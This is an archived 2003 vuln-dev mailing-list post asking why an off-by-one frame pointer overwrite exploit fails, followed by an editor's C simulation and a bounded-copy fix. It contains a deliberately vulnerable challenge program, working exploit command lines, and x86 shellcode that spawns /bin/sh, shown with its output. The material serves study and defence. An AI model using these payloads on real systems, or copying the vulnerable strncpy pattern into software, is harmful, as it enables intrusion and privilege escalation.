Frame Pointer Overwriting

From: mike cramp (mikecc_at_unixclan.net)
Date: 05/23/03

    To: vuln-dev@securityfocus.com
    Date: 23 May 2003 10:24:59 -0700
    
    

    Hey guys,

    I'm having some trouble with frame pointer overwriting, and I was
    wondering if anyone could shed any light on this.

    First of all, here is the vulnerable program:

    mikecc@darkstar frame $ cat vuln_6.c
    /* Is It Vulnerable!? you sure? check again! */
    /*
     * bob.dtors.net
     *
     * ---------------------------------------------------
     * Dtors Security Research (DSR)
     * Code by: bob
     * Mail: bob@dtors.net
     * ---------------------------------------------------
     *
     * Build it and exploit it
     * show us the exploitation log and get extra rights !!
     *
     *
     * Is It Vulnerable!? you sure? check again!
     * -- this code was taken from bobs person homepage
     * http://it.dtors.net
     */

    #include <stdio.h>
    #include <stdlib.h>   /* exit() */
    #include <string.h>
    #define SIZE 256

    void bob(char *ptr) {
        char buffer[SIZE];
        /* off-by-one: strncpy writes (and NUL-pads to) SIZE+1 bytes into a SIZE-byte buffer */
        strncpy(buffer, ptr, SIZE + 1);
        printf("buffer is at %p\n", buffer);
        {
            int a, b;
            /* dump SIZE+1 bytes, 26 per line, so the overflow byte is printed as well */
            for (a = b = 0; a <= SIZE; a++, b += 3) {
                if (b != 0 && !(b % 26)) printf("\n");
                printf("%02x ", (unsigned char)buffer[a]);
            }
            printf("\n");
        }
    }

    int main(int argc, char **argv, char **envp) {
        if (argc < 2) {
            fprintf(stdout, "bob@dtors.net\n");
            exit(1);
        }
        bob(argv[1]);
        return 0;
    }
    mikecc@darkstar frame $

    Now, I can exploit this if I store the shellcode in the environment:

    mikecc@darkstar frame $ ./6 `perl -e 'print "\xd0\xfd\xff\xbf"x64 . "\x00"'`
    buffer is at 0xbffff4a8
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf 00
    sh-2.05b$

    But, I do not understand how to find the overflow byte, or why this one
    works: \x00

    Now since I am researching a remote frame pointer overwrite, I need to
    learn how to store the exploit string in the command line:

    mikecc@darkstar frame $ ./6 `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xe3\x52\x53\x89\xe1\xcd\x80\x90\x90" . "\x63\xf9\xff\xbf"x58 . "\x09"'`
    buffer is at 0xbffff6a8
    6a 0b 58 99 52 68 6e 2f 73 68 68 2f 2f 62 69 e3 52 53 89 e1 cd 80 90 90 63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
    63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
    63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
    63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
    63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 00
    Illegal instruction (core dumped)
    mikecc@darkstar frame $

    When I open up the core dump, I check ebp:

    (gdb) i reg ebp
    ebp 0xbffff963 0xbffff963
    (gdb)

    Now since I cannot copy and paste weird ASCII characters in Evolution, I
    do:

    x/s $ebp

    and it shows my shellcode. Why is this not executing a shell?

    Thanks,

    Mike
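Editor's note, added to this archived post and not part of Mike's message or of the DSR challenge code: the defect in vuln_6.c is that strncpy(buffer, ptr, SIZE+1) always writes exactly SIZE+1 bytes, copying from the source until its NUL and zero-padding the rest, so the 257th byte written lands one past buffer[255]. The model below simulates that frame as a plain byte array (buffer[256] immediately followed by a little-endian 4-byte saved frame pointer; real compilers may insert padding, so the layout is an assumption), runs an emulation of the off-by-one copy next to a bounded replacement, and reports the saved frame pointer afterwards. The sample frame pointer 0xbffff6d8, the 'A' filler and all function names are constructed for this example. It shows why a 256-byte argument leaves 0x00 in the low byte (the padding byte) and why a 257-byte argument places its last byte there, and that the bounded copy leaves the saved pointer untouched and reports the oversized input.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define SIZE 256
#define FP_BYTES 4               /* 32-bit x86 frame, as in the post */
#define SAMPLE_FP 0xbffff6d8u    /* constructed sample saved frame pointer */

/* Assumed model of bob()'s frame: buffer[SIZE] directly followed by the
 * 4-byte saved frame pointer (little-endian). Illustration only; a real
 * compiler may place padding between the two. */
typedef struct {
    unsigned char bytes[SIZE + FP_BYTES];
} frame_t;

static void frame_init(frame_t *f, uint32_t saved_fp) {
    memset(f->bytes, 0, sizeof f->bytes);
    for (int i = 0; i < FP_BYTES; i++)
        f->bytes[SIZE + i] = (unsigned char)(saved_fp >> (8 * i));
}

static uint32_t frame_saved_fp(const frame_t *f) {
    uint32_t v = 0;
    for (int i = 0; i < FP_BYTES; i++)
        v |= (uint32_t)f->bytes[SIZE + i] << (8 * i);
    return v;
}

/* Emulates strncpy(buffer, ptr, SIZE+1) from vuln_6.c: exactly n bytes are
 * written, source bytes up to the NUL and then zero padding, so with
 * n = SIZE+1 the write always reaches bytes[SIZE], the low byte of the
 * saved frame pointer, whether that byte comes from the source or the pad. */
static void vulnerable_copy(frame_t *f, const char *src) {
    size_t n = SIZE + 1, i = 0;
    for (; i < n && src[i] != '\0'; i++)
        f->bytes[i] = (unsigned char)src[i];
    for (; i < n; i++)
        f->bytes[i] = 0;
}

/* Hardened replacement: never writes beyond dst[dstsz-1], always
 * NUL-terminates, and returns -1 so the caller can reject oversized input
 * instead of silently overrunning. */
int safe_copy(char *dst, size_t dstsz, const char *src) {
    size_t len = strlen(src);
    if (dstsz == 0)
        return -1;
    if (len >= dstsz) {
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Constructed input: SIZE filler bytes followed by one chosen byte. A
 * last_byte of 0 yields a 256-byte string (like the post's first run),
 * any other value a 257-byte string. */
static void build_input(char *src, unsigned char last_byte) {
    memset(src, 'A', SIZE);
    src[SIZE] = (char)last_byte;
    src[SIZE + 1] = '\0';
}

/* Saved frame pointer after the off-by-one copy. */
uint32_t saved_fp_after_overflow(unsigned char last_byte) {
    char src[SIZE + 2];
    frame_t f;
    build_input(src, last_byte);
    frame_init(&f, SAMPLE_FP);
    vulnerable_copy(&f, src);
    return frame_saved_fp(&f);
}

/* Saved frame pointer after the bounded copy into the same frame. */
uint32_t saved_fp_after_safe_copy(unsigned char last_byte) {
    char src[SIZE + 2];
    frame_t f;
    build_input(src, last_byte);
    frame_init(&f, SAMPLE_FP);
    safe_copy((char *)f.bytes, SIZE, src);
    return frame_saved_fp(&f);
}

/* Return code of the bounded copy for the same input (-1 = did not fit). */
int safe_copy_rc(unsigned char last_byte) {
    char src[SIZE + 2];
    char dst[SIZE];
    build_input(src, last_byte);
    return safe_copy(dst, sizeof dst, src);
}

int main(void) {
    printf("original saved fp     : 0x%08lx\n", (unsigned long)SAMPLE_FP);
    printf("after overflow (0x00) : 0x%08lx\n", (unsigned long)saved_fp_after_overflow(0x00));
    printf("after overflow (0x09) : 0x%08lx\n", (unsigned long)saved_fp_after_overflow(0x09));
    printf("after safe_copy       : 0x%08lx (rc=%d)\n",
           (unsigned long)saved_fp_after_safe_copy(0x09), safe_copy_rc(0x09));
    return 0;
}
```

The dump in the post already prints buffer[256], so the last hex byte on each run is exactly the value that reaches the saved frame pointer's low byte in this model; the fix for the program is to copy at most SIZE-1 bytes, terminate explicitly, and refuse input that does not fit, which is what safe_copy does.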

